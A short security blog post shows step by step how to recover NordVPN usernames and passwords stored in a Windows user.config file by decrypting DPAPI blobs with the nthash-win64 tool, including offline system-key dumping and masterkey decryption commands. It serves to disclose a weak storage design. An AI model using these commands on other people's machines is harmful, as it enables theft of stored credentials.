Jan 272020
 

We now know that dpapi secrets are everywhere stored in various ways.

Lets have a look at the popular vpn client : NordVPN.
NordVPN stores its secrets (username/password) on a config file (xml format) and is using a machine scope (not good if you ask me…).

Lets see how to decrypt it.

1-Retrieve nordvpn user.config in c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\

2-Retrieve the base64 values for username and password

example below of a base64 string
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA
AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx
xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/
NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=

3-Decode it to a hexa string

echo base64string| nthash-win64 /base64decodehexa

4-Save the hexa string to a file

echo hexastring| nthash-win64 /hexatofile

or … steps 2,3 and 4 can be done in one go (pipe in…pipe out…) like below

echo base64string| nthash-win64 /base64decodehexa | nthash-win64 /hexatofile

5-Retrieve the mk guid
nthash-win64 /decodeblob

6-Retrieve the dpapy system key

nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(if machine key does not work, try user key)

7-Decrypt the (encrypted) masterkey

echo mydpapisyskey| nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\ProtectS-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52

8-Finally, decrypt the dpapi blob

echo mymksha1key| nthash-win64 /decodeblob

or … steps 6,7 and 8 can be done in one go like below

NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob

Note that, online, any user logged on that machine, could simple do the below

echo base64string| nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.